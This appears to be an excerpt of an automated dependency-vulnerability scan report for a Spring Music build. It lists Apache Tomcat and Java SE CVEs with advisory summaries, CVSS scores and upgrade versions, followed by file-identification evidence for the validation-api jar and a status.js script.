CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2024-24549
Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.
Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.
CWE-20 Improper Input Validation, NVD-CWE-noinfo
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2019-12418
When Apache Tomcat 9.0.0.M1 to 9.0.28, 8.5.0 to 8.5.47, 7.0.0 and 7.0.97 is configured with the JMX Remote Lifecycle Listener, a local attacker without access to the Tomcat process or configuration files is able to manipulate the RMI registry to perform a man-in-the-middle attack to capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and gain complete control over the Tomcat instance.
NVD-CWE-noinfo
CVSSv3: Base Score: HIGH (7.0) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.0/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.4) Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:P
References: entries from af854a3a-2127-422b-91ae-364da2661108 and security@apache.org tagged MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY and VENDOR_ADVISORY (reference URLs not preserved in this extraction)
Vulnerable Software & Versions:
CVE-2020-9484
When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.
CWE: CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (7.0) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.0/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.4) Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:P
References: 21 entries from af854a3a-2127-422b-91ae-364da2661108 and 21 from security@apache.org (link URLs not captured in this export); tags: MAILING_LIST, MITIGATION, PATCH, THIRD_PARTY_ADVISORY, VDB_ENTRY
Vulnerable Software & Versions:
CVE-2021-25329
The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0 to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue.
CWE: NVD-CWE-noinfo
CVSSv3: Base Score: HIGH (7.0) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.0/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.4) Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:P
References: 9 entries from af854a3a-2127-422b-91ae-364da2661108 and 9 from security@apache.org (link URLs not captured in this export); tags: MAILING_LIST, VENDOR_ADVISORY, PATCH, THIRD_PARTY_ADVISORY
Vulnerable Software & Versions:
CVE-2021-30640
A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65.
CWE: CWE-116 Improper Encoding or Escaping of Output
CVSSv3: Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2024-23672
Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open leading to increased resource consumption. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.
Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99, which fix the issue.
CWE: CWE-459 Incomplete Cleanup
CVSSv3: Base Score: MEDIUM (6.3) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2019-0221
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3: Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2023-41080
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in the FORM authentication feature of Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.
The vulnerability is limited to the ROOT (default) web application.
CWE: CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3: Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2018-8037
If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could result in a user seeing a response intended for a different user. An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also result in a user seeing a response intended for another user. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.9 and 8.5.5 to 8.5.31.
CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References: 10 entries from af854a3a-2127-422b-91ae-364da2661108 and 10 from security@apache.org (link URLs not captured in this export); tags: MAILING_LIST, VENDOR_ADVISORY, PATCH, THIRD_PARTY_ADVISORY, VDB_ENTRY
Vulnerable Software & Versions:
CVE-2019-2684
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 7u211, 8u202, 11.0.2 and 12; Java SE Embedded: 8u201. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).
CWE: NVD-CWE-noinfo
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References: 21 entries from af854a3a-2127-422b-91ae-364da2661108 and 21 from secalert_us@oracle.com (link URLs not captured in this export); tags: MAILING_LIST, PATCH, VENDOR_ADVISORY, THIRD_PARTY_ADVISORY
Vulnerable Software & Versions:
CVE-2021-24122
When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances.
CWE: CWE-706 Use of Incorrectly-Resolved Name or Reference, CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2021-33037
Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances, leading to the possibility of request smuggling when used with a reverse proxy. Specifically:
- Tomcat incorrectly ignored the transfer-encoding header if the client declared it would only accept an HTTP/1.0 response;
- Tomcat honoured the identity encoding; and
- Tomcat did not ensure that, if present, the chunked encoding was the final encoding.
CWE: CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
References: 10 entries from af854a3a-2127-422b-91ae-364da2661108 and 10 from security@apache.org (link URLs not captured in this export); tags: MAILING_LIST, VENDOR_ADVISORY, PATCH, THIRD_PARTY_ADVISORY
Vulnerable Software & Versions:
CVE-2023-42795
Incomplete Cleanup vulnerability in Apache Tomcat. When recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could cause Tomcat to skip some parts of the recycling process, leading to information leaking from the current request/response to the next.
Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.
CWE: CWE-459 Incomplete Cleanup
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2023-45648
Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. A specially crafted, invalid trailer header could cause Tomcat to treat a single request as multiple requests, leading to the possibility of request smuggling when behind a reverse proxy.
Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue.
CWE: CWE-20 Improper Input Validation, NVD-CWE-Other
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2024-21733
Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.
Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.
CWE: CWE-209 Generation of Error Message Containing Sensitive Information
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2020-1935
In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.
CWE: CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3: Base Score: MEDIUM (4.8) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N
References: 11 entries from af854a3a-2127-422b-91ae-364da2661108 and 11 from security@apache.org (link URLs not captured in this export); tags: BROKEN_LINK, MAILING_LIST, VENDOR_ADVISORY, THIRD_PARTY_ADVISORY
Vulnerable Software & Versions:
CVE-2018-11784
When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo') a specially crafted URL could be used to cause the redirect to be generated to any URI of the attacker's choice.
CWE: CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3: Base Score: MEDIUM (4.3) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2020-13943
If an HTTP/2 client connecting to Apache Tomcat 10.0.0-M1 to 10.0.0-M7, 9.0.0.M1 to 9.0.37 or 8.5.0 to 8.5.57 exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it was possible that a subsequent request made on that connection could contain HTTP headers - including HTTP/2 pseudo headers - from a previous request rather than the intended headers. This could lead to users seeing responses for unexpected resources.
CWE: NVD-CWE-noinfo
CVSSv3: Base Score: MEDIUM (4.3) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2023-28708
When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0.-M2, 10.1.0-M1 to 10.1.5, 9.0.0-M1 to 9.0.71 and 8.5.0 to 8.5.85 did not include the secure attribute. This could result in the user agent transmitting the session cookie over an insecure channel.
CWE: CWE-523 Unprotected Transport of Credentials
CVSSv3: Base Score: MEDIUM (4.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2021-43980
The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client.
CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
CVSSv3: Base Score: LOW (3.7) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:2.2/RC:R/MAV:A
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: validation-api-2.0.1.Final.jar
Description:
Bean Validation API
License:
Apache License 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/validation-api-2.0.1.Final.jar
MD5: 5d02c034034a7a16725ceff787e191d6
SHA1: cb855558e6271b1b32e716d24cb85c7f583ce09e
SHA256: 9873b46df1833c9ee8f5bc1ff6853375115dadd8897bcb5a0dffb5848835ee6c
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | validation-api | High
Vendor | jar | package name | javax | Highest
Vendor | jar | package name | validation | Highest
Vendor | Manifest | automatic-module-name | java.validation | Medium
Vendor | Manifest | bundle-symbolicname | javax.validation.api | Medium
Vendor | pom | artifactid | validation-api | Low
Vendor | pom | developer email | emmanuel@hibernate.org | Low
Vendor | pom | developer email | guillaume.smet@hibernate.org | Low
Vendor | pom | developer email | gunnar@hibernate.org | Low
Vendor | pom | developer email | hferents@redhat.com | Low
Vendor | pom | developer id | emmanuelbernard | Medium
Vendor | pom | developer id | epbernard | Medium
Vendor | pom | developer id | guillaume.smet | Medium
Vendor | pom | developer id | gunnar.morling | Medium
Vendor | pom | developer id | hardy.ferentschik | Medium
Vendor | pom | developer name | Emmanuel Bernard | Medium
Vendor | pom | developer name | Guillaume Smet | Medium
Vendor | pom | developer name | Gunnar Morling | Medium
Vendor | pom | developer name | Hardy Ferentschik | Medium
Vendor | pom | developer org | Red Hat, Inc. | Medium
Vendor | pom | groupid | javax.validation | Highest
Vendor | pom | name | Bean Validation API | High
Vendor | pom | url | http://beanvalidation.org | Highest
Product | file | name | validation-api | High
Product | jar | package name | javax | Highest
Product | jar | package name | validation | Highest
Product | Manifest | automatic-module-name | java.validation | Medium
Product | Manifest | Bundle-Name | Bean Validation API | Medium
Product | Manifest | bundle-symbolicname | javax.validation.api | Medium
Product | pom | artifactid | validation-api | Highest
Product | pom | developer email | emmanuel@hibernate.org | Low
Product | pom | developer email | guillaume.smet@hibernate.org | Low
Product | pom | developer email | gunnar@hibernate.org | Low
Product | pom | developer email | hferents@redhat.com | Low
Product | pom | developer id | emmanuelbernard | Low
Product | pom | developer id | epbernard | Low
Product | pom | developer id | guillaume.smet | Low
Product | pom | developer id | gunnar.morling | Low
Product | pom | developer id | hardy.ferentschik | Low
Product | pom | developer name | Emmanuel Bernard | Low
Product | pom | developer name | Guillaume Smet | Low
Product | pom | developer name | Gunnar Morling | Low
Product | pom | developer name | Hardy Ferentschik | Low
Product | pom | developer org | Red Hat, Inc. | Low
Product | pom | groupid | javax.validation | Highest
Product | pom | name | Bean Validation API | High
Product | pom | url | http://beanvalidation.org | Medium
Version | Manifest | Bundle-Version | 2.0.1.Final | High
Version | pom | version | 2.0.1.Final | Highest
status.js
File Path: /github/workspace/build/resources/main/static/js/status.js
MD5: 17aeb2e23abc1780d646852db444ad85
SHA1: 9f5f323d09a60d84488bd1416bba51f8898df834
SHA256: 52f6b0bd287c53317bcd4b5315c8d506c37617b5db27c7fdc124c1b24fc1adf1
Evidence Type Source Name Value Confidence
Related Dependencies
spring-music-sqldb-1.0.jar: status.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/classes/static/js/status.js
MD5: 17aeb2e23abc1780d646852db444ad85
SHA1: 9f5f323d09a60d84488bd1416bba51f8898df834
SHA256: 52f6b0bd287c53317bcd4b5315c8d506c37617b5db27c7fdc124c1b24fc1adf1
status.js
File Path: /github/workspace/src/main/resources/static/js/status.js
MD5: 17aeb2e23abc1780d646852db444ad85
SHA1: 9f5f323d09a60d84488bd1416bba51f8898df834
SHA256: 52f6b0bd287c53317bcd4b5315c8d506c37617b5db27c7fdc124c1b24fc1adf1